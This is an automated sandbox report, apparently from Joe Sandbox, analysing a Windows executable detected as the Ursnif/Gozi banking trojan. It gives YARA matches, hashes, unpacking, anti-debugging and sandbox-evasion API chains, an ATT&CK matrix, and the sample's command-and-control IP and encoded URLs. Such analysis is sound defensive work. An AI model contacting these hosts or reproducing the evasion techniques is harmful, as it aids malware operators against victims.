    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E16DF0_2_007E16DF
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E832C0_2_007E832C
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E1D8A0_2_007E1D8A
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00412E5E0_2_00412E5E
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004129C90_2_004129C9
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004135CE0_2_004135CE
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004131FC0_2_004131FC
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004139B60_2_004139B6
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_007E421F
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E8551 NtQueryVirtualMemory,0_2_007E8551
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00781C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00781C58
    Source: server.exeReversingLabs: Detection: 38%
    Source: server.exeVirustotal: Detection: 50%
    Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_007E30D5
    Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
    Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E7F30 push ecx; ret 0_2_007E7F39
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E831B push ecx; ret 0_2_007E832B
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0085D0A4 push ebp; ret 0_2_0085D0A9
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00857CD7 push 8B8751D0h; retf 0_2_00857CDC
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0085DAFD push ds; ret 0_2_0085DB0B
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0085D782 push ds; ret 0_2_0085D783
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

    Hooking and other Techniques for Hiding and Protection

    barindex
    Yara detected Ursnif
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Found evasive API chain (may stop execution after checking system information)
    Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 98 > 30Jump to behavior
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 82 > 30Jump to behavior
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 46 > 30Jump to behavior
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 99 > 30Jump to behavior
    Source: C:\Users\user\Desktop\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.509882695.00000000008B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

    Anti Debugging

    barindex
    Found API chain indicative of debugger detection
    Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0078092B mov eax, dword ptr fs:[00000030h]0_2_0078092B
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00780D90 mov eax, dword ptr fs:[00000030h]0_2_00780D90
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_008551AC push dword ptr fs:[00000030h]0_2_008551AC
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
    Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
    Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
    Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004118DB
    Source: C:\Users\user\Desktop\server.exeCode function: __crtGetLocaleInfoA_stat,0_2_004154FA
    Source: C:\Users\user\Desktop\server.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,0_2_0041089B
    Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00781C58
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E3BD3 cpuid 0_2_007E3BD3
    Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_007E3BD3

    Stealing of Sensitive Information

    barindex
    Yara detected Ursnif
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected Ursnif
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Windows Management Instrumentation    		Path InterceptionPath Interception11
    Virtualization/Sandbox Evasion    		1
    Input Capture    		1
    System Time Discovery    		Remote Services1
    Input Capture    		Exfiltration Over Other Network Medium2
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    Data Encrypted for Impact
    Default Accounts12
    Native API    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information    		LSASS Memory11
    Security Software Discovery    		Remote Desktop Protocol11
    Archive Collected Data    		Exfiltration Over Bluetooth1
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
    Software Packing    		Security Account Manager11
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
    Process Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer12
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    Account Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
    System Owner/User Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    Remote System Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
    System Information Discovery    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    server.exe38%ReversingLabsWin32.Trojan.Generic
    server.exe51%VirustotalBrowse
    server.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
    0.2.server.exe.7e0000.2.unpack100%AviraHEUR/AGEN.1245293Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://62.173.142.51/0%Avira URL Cloudsafe
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk0%Avira URL Cloudsafe
    http://62.173.142.51/b0%Avira URL Cloudsafe
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb0%Avira URL Cloudsafe
    http://62.1730%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    windowsupdatebg.s.llnwi.net
    		95.140.230.192
    		truefalse
      		unknown
      checklist.skype.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlkfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://62.173.142.51/bserver.exe, 00000000.00000002.509818085.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://62.173.142.51/server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://checklist.skype.com/drew/libExsiR_2B8yxsG/gzT0k6OLSRpq780/hHFpS0TQeiCZoSZxmo/_2BfNC9Bm/rlL_2Bserver.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://62.173server.exe, 00000000.00000002.510020655.00000000023CC000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		low
          http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLbserver.exe, 00000000.00000002.509882695.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          62.173.142.51
          		unknownRussian Federation
          		34300SPACENET-ASInternetServiceProviderRUfalse

          General Information

          Joe Sandbox Version:37.0.0 Beryl
          Analysis ID:825996
          Start date and time:2023-03-14 08:23:06 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 45s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:server.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@1/0@1/1
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 18.4% (good quality ratio 17.6%)
          • Quality average: 81.1%
          • Quality standard deviation: 27.8%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 46
          • Number of non-executed functions: 43
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 209.197.3.8, 93.184.221.240
          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, dual-a-0001.dc-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          windowsupdatebg.s.llnwi.netfile.exeGet hashmaliciousRHADAMANTHYS, lgoogLoaderBrowse
          • 178.79.225.128
          PO-91402278.exeGet hashmaliciousAgentTeslaBrowse
          • 178.79.225.128
          Revised_Proforma_Invoice.exeGet hashmaliciousAgentTeslaBrowse
          • 95.140.230.192
          https://www.appdocusgnrn.com/Get hashmaliciousUnknownBrowse
          • 95.140.230.128
          https://youngersmfg-my.sharepoint.com/:o:/p/morganl/EjVhbkOEEQpCrCtV9dgKPl0BsAntsqExmJGwl54GofmGIQ?e=VQKglhGet hashmaliciousHTMLPhisherBrowse
          • 95.140.230.192
          Vero.htmlGet hashmaliciousUnknownBrowse
          • 178.79.225.0
          https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=4292342187212&EyeblasterID=1086486580&clk=2&ctick=21342&rtu=https%3A%2F%2Fna2signing.web.app/ggrFe5shaBM2x0qgrFe5Fe5ndWO3k17s3RWO3rpdy9s3RWO3BM2Get hashmaliciousHTMLPhisherBrowse
          • 178.79.225.0
          https://baseproductslimited.com/index.html#mancini@astranis.comGet hashmaliciousUnknownBrowse
          • 178.79.225.0
          win.pacGet hashmaliciousUnknownBrowse
          • 178.79.242.0
          ORBAv1KK8C.exeGet hashmaliciousSmokeLoaderBrowse
          • 95.140.236.0
          RFI_NO._2_-_PROVISION_OF_EPCIC_FOR_KCD_ORF.exeGet hashmaliciousFormBookBrowse
          • 178.79.242.128
          Purchase_Enquiry_List.exeGet hashmaliciousAgentTesla, zgRATBrowse
          • 178.79.225.0
          CLkgHWl2wc.exeGet hashmaliciousAgentTesla, zgRATBrowse
          • 95.140.236.128
          z2s0WAHXRp.exeGet hashmaliciousUnknownBrowse
          • 95.140.230.192
          MT103_Halkbank,pdf.exeGet hashmaliciousAgentTeslaBrowse
          • 178.79.225.128
          DHL_Original_Documents..exeGet hashmaliciousUnknownBrowse
          • 178.79.225.0
          Madinat_Zayed_Project_-_GREEN_ECO.vbsGet hashmaliciousUnknownBrowse
          • 178.79.242.0
          LlDYcly3oc.exeGet hashmaliciousRedLineBrowse
          • 178.79.225.0
          5lXC4fzMbvQWIZk.exeGet hashmaliciousAgentTeslaBrowse
          • 95.140.230.192
          jKPzmQq8le.exeGet hashmaliciousAgentTeslaBrowse
          • 178.79.242.128

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          SPACENET-ASInternetServiceProviderRUserver.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.821157222424382
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:server.exe
          File size:239104
          MD5:bfe5c79a11ef437d401fe8a27ea49372
          SHA1:bd04d26776c766934f0acd2885cf97168dc5bbfb
          SHA256:881d60034e97cfa4e36b8da907e5d2e130c9f19abdd386990ee5a9cdce91d117
          SHA512:4b803dd0a1f8c378d4e61f753aa84a690908dcd2de8289e331f4b7cbbc28480883f7b26f272dfc0e109ef133a59642f2221981caf4dcaae6412a2439a2e38fb9
          SSDEEP:6144:iIOuqy8KhQd+1x8toQRwwzsjqxn2Sc4gKO:iLTydhQdjtoR8sjqxn2ScKO
          TLSH:CA349E137391A871E6324A31BE1BC2F5661EFCA44F5967EB23946A2F0D752E1CE31342
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L......b...........................

          File Icon

          Icon Hash:9a82325a89a28ab2

          Static PE Info

          General

          Entrypoint:0x409761
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
